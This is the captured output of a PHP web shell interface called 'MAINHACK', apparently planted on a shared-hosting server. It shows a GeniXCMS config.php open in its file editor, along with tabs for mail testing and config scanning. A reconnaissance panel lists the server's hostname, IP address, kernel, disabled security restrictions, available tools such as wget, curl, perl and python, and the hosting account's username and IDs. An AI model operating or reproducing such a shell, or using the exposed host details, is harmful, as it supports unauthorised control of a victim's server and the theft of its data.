[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: config.php
File is not writable. Editing disabled.
<?php if (defined('GX_LIB') === false) die("Direct Access Not Allowed!"); /** * GeniXCMS - Content Management System * * PHP Based Content Management System and Framework * * @package GeniXCMS * @since 0.0.1 build date 20140925 * @version 2.3.0 * * @link https://github.com/GeniXCMS/GeniXCMS * @author Puguh Wijayanto <[EMAIL_ADDRESS]> * @author GeniXCMS <genixcms@gmail.com> * @copyright 2014-2023 Puguh Wijayanto * @copyright 2023-2026 GeniXCMS * @license http://www.opensource.org/licenses/mit-license.php MIT * */ error_reporting(E_ALL); // DB CONFIG !defined('DB_HOST') ? define('DB_HOST', '[[softdbhost]]') : null; !defined('DB_NAME') ? define('DB_NAME', '[[softdb]]') : null; !defined('DB_PASS') ? define('DB_PASS', '[[softdbpass]]') : null; !defined('DB_USER') ? define('DB_USER', '[[softdbuser]]') : null; !defined('DB_DRIVER') ? define('DB_DRIVER', 'mysql') : null; !defined('SMART_URL') ? define('SMART_URL', false) : null; !defined('GX_URL_PREFIX') ? define('GX_URL_PREFIX', '.html') : null; !defined('ADMIN_DIR') ? define('ADMIN_DIR', 'gxadmin') : null; !defined('USE_MEMCACHED') ? define('USE_MEMCACHED', false) : null; !defined('SITE_ID') ? define('SITE_ID', '[[SITE_ID]]') : null; !defined('DEBUG') ? define('DEBUG', false) : null; !defined('SESSION_EXPIRES') ? define('SESSION_EXPIRES', 720) : null; !defined('SESSION_DB') ? define('SESSION_DB', false) : null; ##################################// # DON't REMOVE or EDIT THIS. # ================================== # YOU WON'T BE ABLE TO LOG IN # IF IT CHANGED. PLEASE BE AWARE ##################################// !defined('SECURITY_KEY') ? define('SECURITY_KEY', '[[SECURITY_KEY]]') : null;
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server306.web-hosting.com
Server IP: 192.64.117.220
PHP Version: 8.2.31
Server Software: LiteSpeed
System: Linux server306.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
HDD Total: 138.28 GB
HDD Free: 102.1 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: awodbsau
User ID (UID): 4522
Group ID (GID): 4521
Script Owner UID: 4522
Current Dir Owner: N/A